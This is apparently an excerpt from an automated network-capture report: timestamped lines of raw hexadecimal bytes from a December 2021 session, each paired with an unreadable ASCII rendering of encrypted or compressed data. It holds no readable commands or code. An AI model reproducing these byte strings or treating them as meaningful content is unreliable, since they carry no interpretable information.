19 90 d7 1e e7 83 be 68 df 68 4d 5b 75 2f 73 1f 45 5e 03 c5 2c 9d 85 8e 2a 87 14 aa d1 a8 42 b7 9c 20 d3 1c 38 cf 0e 9c d7 f0 d3 70 17 18 0a df ba 27 29 10 72 50 56 7d 51 d3 e7 f9 00 23 45 25
                            Data Ascii: o[a1'ATa@xXd1]0nBM!%zO27s;8^xC"E9_eZie*y,FGxY~RPL85vgdiP/|!"Q tUEyA |@:MocZDhhM[u/sE^,*B 8p')rPV}Q#E%
                            2021-12-01 10:57:39 UTC82INData Raw: 57 fc 2b 53 7b 59 7a a8 80 a5 e4 7b 7a 3b 4b c0 c0 b7 bd 89 6c e4 6d 5d 29 21 03 90 7d 89 f9 b1 bd d3 fd 2e 77 b4 85 b4 3a ee 7b a1 73 b1 fa 1c 6c 47 05 4b 33 d9 e5 4d e7 d0 fa 78 64 c5 d1 02 3b a4 b0 fd 5d 79 b7 68 4e 96 4f 44 66 fd 13 52 0d 72 c0 cc da 88 77 52 66 f3 6d 0c ef 0f cd f4 d9 4a 94 d9 4e 12 c4 c2 41 43 ac 5a 2c 78 6a 53 fc b0 bd 6f 01 0f 03 a1 1d 6a 6b 5b 1c 6e 2e a1 57 e6 8e ee 24 6c 8b a9 ff 87 4f 9d 22 10 84 30 b5 5b 05 0d a0 3c 56 ce 32 0b 47 30 6e 1d ef ce fe ea 84 91 10 ed aa 86 5d 1b 02 f8 75 97 35 4f 1d d6 02 d5 7e 7c ec 42 06 eb 9a 86 c6 92 ec ab ac 85 c1 46 9b 84 e7 b7 22 75 66 8d b0 52 c5 7d 2a a4 97 cf f8 70 56 ba 95 fe ec d1 49 e2 8e b5 d0 ce 71 f2 78 61 1b 64 5b 37 67 a8 28 35 08 b7 3e 2d 1b c0 29 88 0d c5 07 7f ea c0 98 71 b4
                            Data Ascii: W+S{Yz{z;Klm])!}.w:{slGK3Mxd;]yhNODfRrwRfmJNACZ,xjSojk[n.W$lO"0[<V2G0n]u5O~|BF"ufR}*pVIqxad[7g(5>-)q
                            2021-12-01 10:57:39 UTC83INData Raw: d1 ec d6 75 ae 13 40 88 ef 6a 02 80 f0 38 9f 74 e9 72 d2 d8 37 e9 23 3d 9e 6f 39 23 ff 6e 96 79 9c fc 9d f4 29 0d a6 70 ec a7 a8 4b 29 92 0e 69 0f e6 da 7d 9b 24 de 78 37 a5 5e 9e 67 f5 05 ca 5d ae 6e da 39 db 86 0b 88 fa a9 c8 11 0f 2e 43 31 08 8a 0c 0f 6f d4 00 33 02 72 6d 6b 0d 96 37 73 02 9c 93 0e aa 9a ea 67 fe 8e 7f f2 01 1a f6 cc ea c9 12 cd af 5d 8f 41 1c d7 7d 98 6e ed ea ac bb e0 33 2d e5 ee 47 f3 33 5e e5 e2 12 04 15 5a 0c e5 10 58 10 f3 20 0e 37 6f 14 8d 7a 24 12 e5 b2 28 b3 59 e9 7c 2a 64 ff c8 33 aa 75 bb 8a 8e 9b 9a 26 29 b1 92 6b 87 f2 a2 40 f5 6c 70 7a 19 6f 1b 90 0d ab 4a cd 9c 71 99 79 3f dc 4a 27 6f a9 89 08 59 c1 ee ce df 5c 1e 70 2c ce f1 9f 45 d8 ba 4e 46 82 cb 0e 06 b0 b3 7b 0f 86 21 95 84 a0 3d 56 5f 50 c4 63 b7 11 20 24 d1 58 9d
                            Data Ascii: u@j8tr7#=o9#ny)pK)i}$x7^g]n9.C1o3rmk7sg]A}n3-G3^ZX 7oz$(Y|*d3u&)k@lpzoJqy?J'oY\p,ENF{!=V_Pc $X
                            2021-12-01 10:57:39 UTC85INData Raw: 96 4f e2 b4 00 cd a9 f3 5c cd ce 07 9e 8e 60 9e 70 39 b8 fa 69 29 03 1f 32 47 b6 20 7d df 2f d9 8a b9 35 c8 bf c3 9e 60 54 03 95 99 77 01 11 72 05 72 8e 70 a7 3b f1 b3 4c 49 2e e2 94 8b b0 2e 17 37 2a ac 7f eb 5f 50 37 10 5d 3f e9 1e b6 f4 75 29 5f 7d 49 6b b5 75 2d 99 84 e8 83 c5 e9 9d dd fa f8 6c 46 a5 37 8f 58 6d ba 6d 28 6c 57 56 74 4f 5e 90 7a dc 45 52 7a 98 ad 99 0f 39 5f 3c 8b 99 72 4f 27 3d 95 34 4a 69 30 a1 2f dd 79 ce a0 67 34 14 21 2f 49 2d 87 71 77 b8 14 0d 8c a6 10 98 57 ad f5 7d bf 54 27 f3 d5 09 77 f2 9c a4 83 17 89 98 b2 e1 5c 1d b5 93 b8 d8 a4 23 f5 87 61 bc 55 9a 55 ce 0c 18 c6 3d e2 30 ed f4 31 b2 45 15 86 74 6f 50 69 7c a8 d5 0f b2 90 50 6b 9f 9c 6f ac e4 d9 d7 f6 06 9f 41 97 b5 68 27 5b 23 d0 46 f7 b8 17 03 2d 03 80 7a 71 a9 43 34 2f
                            Data Ascii: O\`p9i)2G }/5`Twrrp;LI..7*_P7]?u)_}Iku-lF7Xmm(lWVtO^zERz9_<rO'=4Ji0/yg4!/I-qwW}T'w\#aUU=01EtoPi|PkoAh'[#F-zqC4/
                            2021-12-01 10:57:39 UTC86INData Raw: a5 4f e4 61 e3 27 be a0 c1 bc de 3c bf cc 73 0a c9 f4 73 f2 92 1a 77 c4 ee 2a c7 d8 99 07 b5 ed 3a 76 82 ce 72 f4 4b 27 4b ce 77 9d 9c f4 8b 54 f0 96 7d 9c dd e0 00 48 bd 41 b9 a0 e1 82 ce de 5c 51 f4 05 20 04 7d fb 85 d7 10 07 d1 86 c8 e3 2d cc eb 81 2a f6 ea 7d fb 5a 38 b6 6c f8 25 40 37 d7 f2 af f8 63 8f a2 65 00 d9 1f 59 b2 92 0d 0d 4d 84 9d e5 69 82 d0 af 00 cd 3a 43 5f d4 0d 8e 32 89 22 59 dd 53 5c c3 e8 62 5b 29 d3 35 05 a3 e6 a8 29 97 51 44 42 f7 19 3b 1f 0f fe 04 9c c5 c9 28 7f 0b e3 9b e4 a0 49 00 6e b8 39 9e 0c ee c6 e0 af d1 b9 e1 38 14 50 47 b1 c3 38 f5 ad c0 2f 52 92 f0 a6 07 9d c1 e1 92 8c 35 0a a7 fd 6d 74 70 35 84 5a a1 df 9d e8 ec 78 59 d1 5c 91 e7 e5 1b dc e5 34 9f cd 64 09 ae 86 3e 75 e3 49 a3 1f ae a0 17 85 7a 5f 49 a7 2d 23 23 06 e5
                            Data Ascii: Oa'<ssw*:vrK'KwT}HA\Q }-*}Z8l%@7ceYMi:C_2"YS\b[)5)QDB;(In98PG8/R5mtp5ZxY\4d>uIz_I-##
                            2021-12-01 10:57:39 UTC87INData Raw: c6 bf ca 1c 8e 26 64 b3 d8 ba 81 ad bc 40 91 f4 7d 71 15 13 55 79 0d 1b 0b 1d 90 a2 7a d7 7a a6 ab 4b 88 d4 88 c7 c6 b2 be 2b fc 0e 9f 29 3d 09 fd fb f8 7a 55 2b 3c d8 99 1d 4f 41 3d e1 34 3d 69 51 a1 5d dd 1c ce fc 67 79 14 48 2f 2a 2d f5 71 18 b8 67 0d e3 a6 76 98 23 ad a9 7d f6 54 49 f3 a1 09 12 f2 ee a4 ed 17 ec 98 c6 e1 7c 1d f0 93 c0 d8 d4 23 99 87 0e bc 27 9a 30 ce 7e 18 9a 3d ab 30 83 f4 45 b2 20 15 ea 74 03 50 00 7c ee d5 60 b2 e2 50 06 9f ef 6f f0 e4 8a d7 82 06 f0 41 e5 b5 09 27 3c 23 b5 46 c5 b8 17 03 2d 03 a5 7a 02 a9 66 34 1f 11 ef 4c bf 63 15 3b e1 71 a9 e6 4b cb 63 2c 4c 4e 11 ca ae e7 cb 7c b4 9e 06 dd 08 59 50 99 f1 01 02 09 eb 35 f2 b1 b2 11 0c 7c 6e 98 45 82 53 c9 01 b9 4d d0 8c 75 12 fd 8d 59 28 ee fd 1b d7 ce 93 74 12 11 a6 31 7b 01
                            Data Ascii: &d@}qUyzzK+)=zU+<OA=4=iQ]gyH/*-qgv#}TI|#'0~=0E tP|`PoA'<#F-zf4Lc;qKc,LN|YP5|nESMuY(t1{
                            2021-12-01 10:57:39 UTC88INData Raw: a4 63 5b 8d a3 8b 90 42 90 86 d4 45 85 8e 18 94 28 64 96 25 bc 46 21 52 a3 b6 ce 8a 3f ee e6 02 65 b6 79 37 d3 ce 78 5d 21 f6 e9 8a 35 e4 9c c6 6f a1 5d 26 36 a7 63 d2 12 ac 66 2a bc 53 28 e6 89 11 5b 75 d3 7b 20 e6 95 fc 75 d0 74 05 31 a3 45 7e 4a 2f 8d 50 f9 a0 bb 4b 5f 63 a7 f5 85 cf 3d 6c 0f d7 65 f9 48 87 a3 85 c9 a2 d8 bd 4d 56 3c 2b c5 a2 64 96 fa ab 4a 1a f0 91 86 70 d9 aa 80 ce f8 45 6b d5 fd 02 74 16 10 ed 29 cd fa f8 9b 9f 24 77 9d 35 fe 89 82 72 b5 e5 5a 9f ed 41 4d dd e7 62 01 ad 28 e6 1f fa 85 50 f6 3b 7a 1d d4 68 7f 03 42 b1 9a 41 c4 c0 2d 68 f8 c1 6d ee 57 b2 41 a1 1c d3 57 4c b4 3c 7d d3 f6 be df b1 f5 ec 4b 01 7c 66 d2 c7 8d 9f 2c ec 41 04 0f 92 b5 a0 41 73 b2 40 dc b9 24 f5 58 76 9a 0e 80 2a a8 64 c8 5c 2c c3 b2 db 80 a5 69 db 4a b7 b4
                            Data Ascii: c[BE(d%F!R?ey7x]!5o]&6cf*S([u{ ut1E~J/PK_c=leHMV<+dJpEkt)$w5rZAMb(P;zhBA-hmWAWL<}K|f,AAs@$Xv*d\,iJ
                            2021-12-01 10:57:39 UTC90INData Raw: 40 71 51 2f 49 2d 87 02 06 d4 7d 79 e9 95 4f fb 3b c2 86 18 bf 54 27 80 a4 65 1e 86 f9 97 dc 74 e6 f4 c7 8c 32 42 c1 f6 c0 ac a4 50 84 eb 08 c8 30 a9 0a a1 7c 7d a8 0c d4 30 ed 87 40 de 2c 61 e3 47 30 20 1b 19 d8 b4 7d d7 cf 26 59 9f 9c 1c dd 88 b0 a3 93 35 c0 31 e5 d0 18 46 29 46 d0 05 f7 cd 17 71 2d 71 80 1f 71 c7 43 40 2f 47 dd 29 e7 11 15 48 e1 18 cf 89 22 a5 0f 2c 29 4e 2b 99 81 a8 e4 3a 9b ca 06 8a 08 18 50 cb f1 44 51 55 84 78 94 de c6 6b 7b 15 0f f4 37 ee 36 a8 5d e5 00 9d e5 1a 71 87 ff 30 47 82 8e 77 b8 af f5 54 66 57 fa 58 32 73 3d da 85 13 f3 26 7f 8f 92 37 63 13 1b 7e d9 c0 51 19 10 dc 9f f0 32 af 83 63 ef 6c 62 78 4b 90 b1 5a ae 07 dc 36 b9 b3 49 0e 59 ac d3 5a 9f aa 31 e8 54 f7 89 42 e4 dc af a7 39 b4 3f cf 51 10 48 a3 51 fb 8a a2 f0 c1 22
                            Data Ascii: @qQ/I-}yO;T'et2BP0|}0@,aG0 }&Y51F)Fq-qqC@/G)H",)N+:PDQUxk{76]q0GwTfWX2s=&7c~Q2clbxKZ6IYZ1TB9?QHQ"
                            2021-12-01 10:57:39 UTC91INData Raw: a8 75 97 27 44 7e f7 03 3b 1e 0f da 04 b8 c5 e9 28 1a 0b fb 9b c8 a0 52 00 75 b8 0c 9e 24 ee cf e0 a8 d1 84 e1 1a 14 5d 47 b1 c3 01 f5 88 c0 2c 52 9f f0 fe 07 d9 c1 e6 f4 9e 53 0d c1 03 52 74 70 10 84 29 a1 fa dd 9b ec 24 59 9d 5c be a7 e4 1b dc e5 28 9f 88 64 2b ae 88 3e 79 e3 06 a3 7a ae fd 17 93 7a 7a 49 8b 2d 7f 23 3e e5 9a 24 ce a3 2d 00 93 af 08 81 25 de 2f ce 79 b4 3b 25 87 59 4f a0 d8 e2 bb f3 99 80 27 60 7c 05 d2 ac ce bb 43 fe 24 3b 6e 97 d1 90 24 23 f1 40 b9 b7 50 f6 1e 76 f6 07 d7 4f ff 65 a1 74 49 a0 db c4 e5 a5 69 fe 0f bc dd 4b c7 f6 09 b9 59 7f 65 b3 94 de 26 1d 81 e1 77 4e 36 80 9e c6 28 5a 55 4b dd 28 19 2c a2 81 05 e3 d0 b8 f9 0b b8 75 6e 6f 71 cb 65 89 63 db e9 2d 5a 73 6c 37 28 85 3a d5 75 68 d8 bb 87 8b 7c f7 c9 d7 58 93 ad 77 a6 d9
                            Data Ascii: u'D~;(Ru$]G,RSRtp)$Y\(d+>yzzzI-#>$-%/y;%YO'`|C$;n$#@PvOetIiKYe&wN6(ZUK(,unoqec-Zsl7(:uh|Xw
                            2021-12-01 10:57:39 UTC92INData Raw: b2 f8 50 05 9f f3 6f c0 e4 b6 d7 91 06 e6 41 97 b5 68 27 0b 23 bf 46 87 b8 44 03 48 03 f2 7a 07 a9 26 34 5d 11 dd 4c b7 63 7a 3b 91 71 9f e6 4d cb 7d 2c 5d 4e 2b ca d1 e7 8b 7c eb 9e 47 dd 6b 59 33 99 9e 01 24 09 ea 35 e0 b1 c6 11 7b 7c 5f 98 58 82 46 c9 0d b9 61 d0 96 75 02 fd 88 59 28 ee fc 1b dc ce f5 74 35 11 97 31 46 01 4d bf d6 75 96 49 0d f7 e4 37 06 13 69 06 d9 f6 51 2d 43 dc f2 d5 46 dc f3 3f bf 49 0d 0b 39 cc c5 17 ae 66 dc 5f ea dd 24 0e 2d ac a3 13 de c4 52 9b 37 83 e6 23 91 b0 c1 cb 4d 94 3f 8b 02 79 25 d1 25 9e fa c1 a0 b5 43 b8 64 8d 5e 2b e5 ba c1 b8 01 91 a2 dc 95 6e c6 dd 27 a4 1b 0a b0 67 da 29 25 bf 40 0a 5b 1f d6 59 ac 19 6c 8e 50 77 30 fd 14 5a c4 61 69 f5 3c 6e f8 96 e6 24 af b1 e2 52 6a c6 69 89 75 82 36 d7 ac ad ad 81 23 da ca 00
                            Data Ascii: PoAh'#FDHz&4]Lcz;qM},]N+|GkY3$5{|_XFauY(t51FMuI7iQ-CF?I9f_$-R7#M?y%%Cd^+n'g)%@[YlPw0Zai<n$Rjiu6#
                            2021-12-01 10:57:39 UTC93INData Raw: 24 0e 9d 35 fe 89 82 7f b5 8a 5a e8 ed 17 4d 8e e7 73 01 86 28 d0 1f dd 85 76 f6 1d 7a 20 d4 43 7f 44 42 c5 9a 77 c4 d6 2d 62 f8 dc 6d f8 57 ad 41 ba 1c d1 57 48 b4 05 7d f0 f6 90 df 9c f5 e6 4b 09 7c 69 d2 c9 8d a4 2c d1 41 3c 0f 8c b5 88 41 4f b2 5d dc b9 24 f8 58 1f 9a 62 80 4f a8 44 c8 6f 2c 80 b2 dc 80 d2 69 9f 4a b6 b4 5a 97 d8 66 97 3c 65 16 d0 d7 ac 54 72 f8 92 07 21 42 e6 ad b2 1a 06 7b 04 b9 4e 75 4a ce e8 05 80 93 af 80 27 cc 17 1a 28 18 8b 02 ed 0c c5 80 0c 3b 74 15 02 28 e9 3a ba 26 07 b0 d0 eb d7 0b a7 a8 a5 28 fc c4 11 88 b0 96 1c a9 4d 6a 8a b9 cf 8f ed d7 53 b0 99 4f d3 49 75 29 ca 58 44 53 0e f0 97 93 6a 09 81 91 f5 e2 e2 e2 7f e0 45 ab 04 23 80 d9 f3 72 6d 1b 43 be f5 a7 d5 3c 9c 7b a0 c0 c1 80 b9 af 25 8e 69 64 83 b9 a9 ed b0 fb 46 e5
                            Data Ascii: $5ZMs(vz CDBw-bmWAWH}K|i,A<AO]$XbODo,iJZf<eTr!B{NuJ'(;t(:&(MjSOIu)XDSjE#rmC<{%idF
                            2021-12-01 10:57:39 UTC95INData Raw: 94 de c6 77 7b 08 0f ef 37 e3 36 bb 5d dc 00 8c e5 33 71 9c ff 2b 47 b2 8e 4b b8 a2 f5 01 66 76 fa 58 32 6f 3d cc 85 29 f3 0f 7f a3 92 67 63 4f 1b 4e d9 99 51 5e 10 a8 9f a6 32 dc 83 3f ef 1a 62 64 4b aa b1 63 ae 11 dc 3e b9 af 49 6b 59 f0 d3 55 9f a5 31 e9 54 b1 89 7f e4 e0 af a7 39 e1 3f ec 51 10 48 bf 51 ed 8a 9d f0 f3 22 ec 17 dd 2d 77 92 f2 ae d7 73 e2 c6 a8 95 1d c6 dd 74 81 74 79 d6 3b ae 6f 52 de 21 78 29 3f b3 14 f0 78 25 e0 3e 16 53 9a 66 3f a1 13 0d a9 55 3e b5 e4 87 4b c6 d7 8e 3b 36 aa 20 ec 11 de 53 87 c2 c1 d9 f4 4a bd be 69 63 c8 9a 00 82 b7 69 65 b3 f5 58 c2 87 b3 66 ed 98 6d 76 c7 bb 35 91 78 49 6f a3 50 c2 db 95 ca 21 d4 96 4f f3 9c 89 57 21 fe 1e f8 d2 b9 82 88 b2 07 36 b0 6b 11 04 4e de b6 a4 53 5b fc a3 8e 90 1c 90 d2 d4 1f 85 a8 18
                            Data Ascii: w{76]3q+GKfvX2o=)gcONQ^2?bdKc>IkYU1T9?QHQ"-wstty;oR!x)?x%>Sf?U>K;6 SJicieXfmv5xIoP!OW!6kNS[
                            2021-12-01 10:57:39 UTC96INData Raw: 8d 2d 73 63 f9 c6 fc 38 23 dc 32 bf d6 78 93 28 1f e8 62 ef 4f ce 17 a1 00 40 e6 d7 a8 f3 a5 47 fe 32 c4 d9 3f fb 84 66 da 3c 0c 33 b3 a4 de 08 1d bc e1 62 4e 2e 80 d8 c6 62 5a 1e 4b ff 28 21 2c 9e 81 59 e3 e0 ca e9 7b b8 26 7f 1d 6b a5 2c dd 74 99 ed 43 57 01 15 76 28 85 3a d5 26 68 95 bb 98 8b 57 f7 ef d7 47 93 82 77 dc d9 c6 70 f5 28 19 f9 dc 93 fb a2 a3 26 d9 ed 21 bf 2e 1a 5a a5 04 2f 10 0e 9f c4 fd 05 67 e7 f4 81 81 95 96 1e 89 37 c4 61 4d dc aa be 5c 04 6f 20 c6 87 d3 ba 3c ef 31 cf a1 a7 d3 cd e9 79 fa 26 14 e5 b9 cf ed d9 ba 25 87 bd 65 14 1d 13 13 79 59 4d 3a 68 fc d6 74 a7 6a c8 89 2a 92 b8 91 c7 af e4 a5 5e f5 7a dc 45 52 7a bd ad ea 0f 65 5f 19 8b ea 72 6a 27 54 95 68 4a 0c 30 cf 2f be 79 9e a0 10 34 70 21 01 49 47 87 02 77 dc 14 0d 8c a6 10
                            Data Ascii: -sc8#2x(bO@G2?f<3bN.bZK(!,Y{&k,tCWv(:&hWGwp(&!.Z/g7aM\o <1y&%eyYM:htj*^zERze_rj'ThJ0/y4p!IGw
                            2021-12-01 10:57:39 UTC97INData Raw: 5f e5 dd 02 0e 30 ac 87 13 cb c4 68 9b 08 83 da 23 81 b0 dc cb 4a 94 56 8b 3e 79 26 d1 22 9e 8a c1 f0 b5 22 b8 17 8d 7e 2b fd ba c8 b8 07 91 b1 dc f4 6e b4 dd 11 a4 28 0a 85 67 c7 29 3f bf 4e 0a 47 1f e7 59 91 19 51 8e 56 77 32 fd 0b 5a fd 61 5d f5 20 6e e1 96 d3 24 9f b1 d2 52 65 c6 45 89 62 82 20 d7 ab ad b6 81 24 da cd 00 63 a6 c5 73 e6 f3 0c 04 d0 81 58 a3 87 ef 43 d9 eb 5f 29 82 df 01 f4 39 2a 2a a3 12 c2 ea f9 e7 52 95 f7 7d 80 af fb 67 57 d3 30 cc b6 8d ee ce de 33 36 9d 6b 53 48 0e bf cc e7 62 22 a1 d7 9d fe 5d e2 84 a0 4f e6 9e 5c 9a 5c 59 96 6c d0 25 52 37 c2 f2 bd f8 4c 8f c8 65 00 d9 01 59 b6 92 78 0d 4d 84 8a e5 5e 82 9c af 4a cd 2e 43 6a d4 2e 8e 7b 89 05 59 ce 53 47 c3 fa 62 34 29 b5 35 54 a3 c9 a8 36 97 06 44 54 f7 21 3b 2f 0f e3 04 8d c5
                            Data Ascii: _0h#JV>y&""~+n(g)?NGYQVw2Za] n$ReEb $csXC_)9**R}gW036kSHb"]O\\Yl%R7LeYxM^J.Cj.{YSGb4)5T6DT!;/
                            2021-12-01 10:57:39 UTC98INData Raw: dd 38 e7 63 15 3b e1 54 cf 95 22 97 0f 7f 29 3b 2b ba 81 82 e4 0e 9b ce 06 a8 08 2d 50 ed f1 78 51 09 84 66 94 d4 c6 62 7b 0f 0f f1 37 ed 36 a7 5d ca 00 fa e5 75 71 8e ff 3f 47 9a 8e 6b b8 f4 f5 5b 66 3e fa 31 32 67 3d cb 85 05 f3 73 7f d8 92 18 63 13 1b 06 d9 90 51 59 10 ac 9f a6 32 e6 83 10 ef 66 62 0b 4b a4 b1 63 ae 12 dc 2f b9 e7 49 21 59 83 d3 13 9f ac 31 ef 54 f7 89 53 e4 c3 af f1 39 bb 3f a4 51 79 48 d1 51 be 8a c1 f0 ce 22 96 17 b7 2d 68 92 e8 ae fd 73 d5 c6 e6 95 40 c6 a0 74 a4 74 0a d6 1c ae 6a 52 ed 21 4f 29 51 b3 24 f0 19 25 8e 3e 0c 53 be 66 08 a1 25 0d b7 55 13 b5 96 87 24 c6 e1 8e 20 36 a9 20 ef 11 eb 53 bb c2 c8 d9 f2 4a da be 00 63 83 9a 00 82 af 69 57 b3 f8 58 cd 87 8c 66 b6 98 29 76 e7 bb 73 91 40 49 2a a3 12 c2 b9 95 9e 21 fb 96 1e f3
                            Data Ascii: 8c;T");+-PxQfb{76]uq?Gk[f>12g=scQY2fbKc/I!Y1TS9?QyHQ"-hs@ttjR!O)Q$%>Sf%U$ 6 SJciWXf)vs@I*!
                            2021-12-01 10:57:39 UTC99INData Raw: 4c a1 83 4f 65 8c db 08 f3 77 e4 68 c3 16 f7 38 55 cd 2b 14 c7 9e 96 ff db 96 a9 6b 51 45 3c ea 81 bf e7 1c b4 61 11 76 d9 ff 93 24 51 d5 57 b2 f6 6d f1 2b 7a f4 4e a0 0e c4 7b e8 52 45 81 da dc f3 85 3b 9b 39 a1 c6 49 f2 e0 48 d7 36 01 1c fe b8 ac 31 3d 91 8f 61 21 30 ed cc b2 73 35 15 71 99 40 01 58 be bb 2a cc e4 bd f7 55 a5 44 69 78 76 d6 6d bb 78 ee e1 31 5e 2f 76 19 45 aa 37 df 2b 62 b0 bb eb 8b 0b f7 a8 d7 28 93 c4 77 88 d9 96 70 a9 28 6a f9 b9 93 8f a2 d7 26 b0 ed 4f bf 49 1a 29 a5 58 2f 53 0e f0 c4 93 05 09 e7 91 81 e2 95 e2 1e e0 37 ab 61 23 dc d9 be 72 04 a6 97 f0 ec 66 9f 11 eb 8d 19 94 4b 5d 6f cd 54 e1 a3 6f b2 94 c5 e5 c8 bf 2a 8d 59 41 6e 2b 9d 55 79 0d 4d fc 58 fb a1 19 c6 11 26 47 7b f4 21 e5 03 ab e3 50 aa fa 0a e9 e0 31 93 3b 38 fd 91
                            Data Ascii: LOewh8U+kQE<av$QWm+zN{RE;9IH61=a!0s5q@X*UDixvmx1^/vE7+b(wp(j&OI)X/S7a#rfK]oTo*YAn+UyMX&G{!P1;8
                            2021-12-01 10:57:39 UTC101INData Raw: bf 85 75 f3 49 7f f7 96 a7 62 13 1b 56 d8 f6 d1 a2 11 dc 9f d5 32 dc 83 3f ef 49 2a 9b 4a cc fd 47 af 66 90 d0 b8 dd 49 0e 59 ac d3 13 9f c4 63 0b 55 83 91 73 e5 b0 af cb 39 94 3f 8b 51 79 48 d1 51 9e 8a c1 f0 b5 22 b8 17 8d df a4 93 ba 48 37 72 91 1c 53 94 6e 0c 52 75 a4 ce 85 d7 67 ae 29 52 bf 29 0a 29 9f b5 59 f0 99 27 8e 3e f7 53 fd 66 5a 31 ee 0c f5 cb e1 b4 96 84 24 c6 31 fd 52 36 46 37 89 11 02 40 d7 c2 2d c9 81 4a 5a ba 00 63 26 9a 73 82 f3 5d 94 b2 81 4a 33 86 ef 44 49 99 5f 76 82 bb 01 18 39 2e 4f d7 73 a6 8e e7 8e 4f f3 f9 7d 7b af ef 15 44 b6 7f a8 b6 ff eb a0 d4 5c 36 9d 3c 00 36 22 ed b7 8a 74 37 bd a3 c8 92 2f d7 8e a0 66 e4 99 6c be 5a 4a f9 1e bc 25 52 33 f0 97 ba b4 5e fc 92 20 17 ab 16 2b d3 92 b3 0f 69 e1 88 95 74 ee f0 c0 0c cd 92 41
                            Data Ascii: uIbV2?I*JGfIYcUs9?QyHQ"H7rSnRug)R))Y'>SfZ1$1R6F7@-JZc&s]J3DI_v9.OsO}{D\6<6"t7/flZJ%R3^ +itA
                            2021-12-01 10:57:39 UTC102INData Raw: 07 14 f6 4a ac 9c e9 c7 f3 fa 0b 8d 68 71 97 de d2 10 3d 56 8a e1 84 b4 66 f5 cb 58 ce cb 05 73 03 5a 10 4b d2 60 8a 8d 88 35 82 e3 0c ec 74 d3 ab bf 61 76 62 85 9e 55 18 68 c5 41 7b 1b af 67 38 47 49 16 04 78 0c 08 a0 86 56 a3 5d 10 73 a5 79 5d 47 b6 20 7d df 2f d9 8a b9 35 c8 bf c3 9e 60 54 03 95 99 77 01 11 72 05 72 8e 70 a7 3b f1 b3 4c 49 29 f9 8f 94 e5 6e 57 6e 76 ed 22 b1 00 11 6b 4b 1c 61 b1 40 f6 ef 73 25 5b 77 52 77 f4 6a 2a 86 d4 ee 88 97 b4 c5 85 6a 68 fc d6 35 a7 1f c8 fd 2a fd b8 fc c7 c6 e4 df 5e 90 7a dc 45 52 7a 98 ad 99 0f 39 5f 3c 8b 99 72 4f 27 3d 95 34 4a 69 30 a1 2f dd 79 ce a0 67 34 14 21 2f 49 2d 87 71 77 b8 14 0d 8c a6 10 98 57 ad f5 7d bf 54 27 f3 d5 09 77 f2 9c a4 83 17 89 98 b2 e1 5c 1d b5 93 b8 d8 a4 23 f5 87 61 bc 55 9a 55 ce
                            Data Ascii: Jhq=VfXsZK`5tavbUhA{g8GIxV]sy]G }/5`Twrrp;LI)nWnv"kKa@s%[wRwj*jh5*^zERz9_<rO'=4Ji0/yg4!/I-qwW}T'w\#aUU
                            2021-12-01 10:57:39 UTC103INData Raw: 17 8d 2d 2b 92 ba ae b8 73 91 c6 dc 95 6e c6 dd 74 a4 74 0a d6 67 ae 29 52 bf 21 0a 29 1f b3 59 f0 19 25 8e 3e 77 53 fd 66 5a a1 61 0d f5 55 6e b5 96 87 24 c6 b1 8e 52 36 c6 20 89 11 82 53 d7 c2 ad d9 81 4a da be 00 63 a6 9a 73 82 f3 69 04 b3 81 58 a3 87 ef 66 d9 98 5f 76 82 bb 01 91 39 49 2a a3 12 c2 ea 95 e7 21 95 96 7d f3 af 89 67 21 d3 1e cc d2 8d 82 ce b2 33 36 9d 6b 53 04 7d de 85 a4 10 5b d1 a3 c8 90 2d 90 eb d4 2a 85 ea 18 fb 28 38 96 6c bc 25 21 37 a3 f2 ce f8 3f 8f e6 65 65 d9 79 59 d3 92 78 0d 21 84 e9 e5 35 82 9c af 6f cd 5d 43 36 d4 63 8e 12 89 66 59 bc 53 28 c3 89 62 5b 29 d3 35 20 a3 95 a8 75 97 74 44 31 f7 45 3b 4a 0f 8d 04 f9 c5 bb 28 5f 0b a7 9b 85 a0 3d 00 0f b8 65 9e 48 ee a3 e0 c9 d1 d8 e1 4d 14 3c 47 c5 c3 64 f5 fa c0 4a 52 f0 f0 86
                            Data Ascii: -+snttg)R!)Y%>wSfZaUn$R6 SJcsiXf_v9I*!}g!36kS}[-*(8l%!7?eeyYx!5o]C6cfYS(b[)5 utD1E;J(_=eHM<GdJR
                            2021-12-01 10:57:39 UTC104INData Raw: 70 a9 28 6a f9 b9 93 8f a2 d7 26 b0 ed 4f bf 49 1a 29 a5 58 2f 53 0e f0 c4 93 05 09 e7 91 81 e2 95 e2 1e e0 37 ab 61 23 dc d9 be 72 04 1b 20 be 87 a7 ba 3c ef 7b cf c0 a7 80 cd af 79 8e 26 64 e5 b9 cf ed d9 fb 25 e5 bd 09 14 78 13 55 79 0d 4d 6a 68 fc d6 35 a7 1f c8 fd 2a fd b8 fc c7 c6 e4 df 5e 90 7a dc 45 52 7a 98 ad 99 0f 39 5f 3c 8b 99 72 4f 27 3d 95 34 4a 69 30 a1 2f dd 79 ce a0 67 34 14 21 2f 49 2d 87 71 77 b8 14 0d 8c a6 10 98 57 ad f5 7d bf 54 27 f3 d5 09 77 f2 9c a4 83 17 89 98 b2 e1 5c 1d b5 93 b8 d8 a4 23 f5 87 61 bc 55 9a 55 ce 0c 18 c6 3d e2 30 ed f4 31 b2 45 15 86 74 6f 50 69 7c a8 d5 0f b2 90 50 6b 9f 9c 6f ac e4 d9 d7 f6 06 9f 41 97 b5 68 27 5b 23 d0 46 f7 b8 17 03 2d 03 80 7a 71 a9 43 34 2f 11 dd 4c e7 63 15 3b e1 71 cf e6 22 cb 0f 2c 29
                            Data Ascii: p(j&OI)X/S7a#r <{y&d%xUyMjh5*^zERz9_<rO'=4Ji0/yg4!/I-qwW}T'w\#aUU=01EtoPi|PkoAh'[#F-zqC4/Lc;q",)
                            2021-12-01 10:57:39 UTC106INData Raw: a6 9a 73 82 f3 69 04 b3 81 58 a3 87 ef 66 d9 98 5f 76 82 bb 01 91 39 49 2a a3 12 c2 ea 95 e7 21 95 96 7d f3 af 89 67 21 d3 1e cc d2 8d 82 ce b2 33 36 9d 6b 53 04 7d de 85 a4 10 5b d1 a3 c8 90 2d 90 eb d4 2a 85 ea 18 fb 28 38 96 6c bc 25 21 37 a3 f2 ce f8 3f 8f e6 65 65 d9 79 59 d3 92 78 0d 21 84 e9 e5 35 82 9c af 6f cd 5d 43 36 d4 63 8e 12 89 66 59 bc 53 28 c3 89 62 5b 29 d3 35 20 a3 95 a8 75 97 74 44 31 f7 45 3b 4a 0f 8d 04 f9 c5 bb 28 5f 0b a7 9b 85 a0 3d 00 0f b8 65 9e 48 ee a3 e0 c9 d1 d8 e1 4d 14 3c 47 c5 c3 64 f5 fa c0 4a 52 f0 f0 